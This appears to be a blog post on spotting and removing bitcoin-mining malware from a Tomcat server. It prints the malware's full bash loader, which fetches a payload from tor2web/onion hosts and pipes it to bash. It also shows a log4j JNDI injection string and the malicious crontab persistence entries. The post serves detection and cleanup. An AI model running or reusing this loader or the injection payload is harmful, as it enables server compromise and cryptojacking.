Malware Running Bash Process Communicating With Tor2web Sites
Categories:
3 minute read
If you see the following process running on your server then your server is most likely infected with bitcoin mining malware.
$ ps -ef
...
tomcat 1710 1695 0 11:21 ? 00:00:00 /bin/bash -c n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr " " "\n"|sort -uR|head -1);FETCH_OPTS="-fsSLk --connect-timeout 26 --max-time 75";(curl -x socks5h://$s:9050 bvprzqhoz7j2ltin.onion/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.tor2web.su/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ly/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ws/src/ldm)|bash
tomcat 1725 1710 0 11:21 ? 00:00:00 /bin/bash -c n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch);p=$(echo "dns-query?name=relay.l33t-ppl.info");s=$(curl https://${n[$((RANDOM%13))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr " " "\n"|sort -uR|head -1);FETCH_OPTS="-fsSLk --connect-timeout 26 --max-time 75";(curl -x socks5h://$s:9050 bvprzqhoz7j2ltin.onion/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.tor2web.su/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ly/src/ldm || curl ${FETCH_OPTS} https://bvprzqhoz7j2ltin.onion.ws/src/ldm)|bash
tomcat 1727 1725 0 11:21 ? 00:00:00 curl https://doh.centraleu.pi-dns.com/dns-query?name=relay.l33t-ppl.info
tomcat 1728 1725 0 11:21 ? 00:00:00 grep -oE \b([0-9]{1,3}\.){3}[0-9]{1,3}\b
tomcat 1729 1725 0 11:21 ? 00:00:00 tr \n
tomcat 1730 1725 0 11:21 ? 00:00:00 sort -uR
tomcat 1731 1725 0 11:21 ? 00:00:00 head -1
How did they get into the server?
There are several possibilities, however, in recent days the major reason is the log4j2 security issue.
e.g. If you are logging the username during the login as follows
log.debug("Username : {}", username)
then if the hacker tries to input the username as ${jndi:ldap://attackerserver.com.com/x}
then log4j process treats this as a JNDI lookup instead of logging it as a string. Yeah :-)
Hackers use this JNDI lookup to point to their server and download scripts etc and run them in your server. They are also smart enough to mark their scripts to start during system startup.
How to clean this up?
If you are running the server within the cloud like AWS or Google then it is better to relaunch a new instance based on the previous image that wasn’t infected.
If you can’t do that for whatever reason then you may try the following approach to cleanup.
Check and Cleanup the startup process
Check which user is running the above-mentioned processes and switch to that user e.g. in the above example the process was running by tomcat
so switch the user as follows.
$ sudo su tomcat
Check the crontab to see the startup process
$ crontab -e
It should probably show the following (in addition to one that you already configured if any)
HELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=''
HOME=/
* * * * * /tmp/pty3 > /dev/null 2>&1 &
* * * * * /dev/shm/pty3 > /dev/null 2>&1 &
* * * * * /var/lock/pty3 > /dev/null 2>&1 &
* * * * * n=(doh.defaultroutes.de dns.hostux.net dns.dns-over-https.com uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is
Remove all these.
In the application user’s directory check if there are any new files created. e.g. in the tomcat bin, logs, etc directory, and delete them if you are sure they are not part of the application and they look suspicious. (Take care here not to delete any application or OS-specific files)
Restart your server. You should most probably not see those bash processes anymore.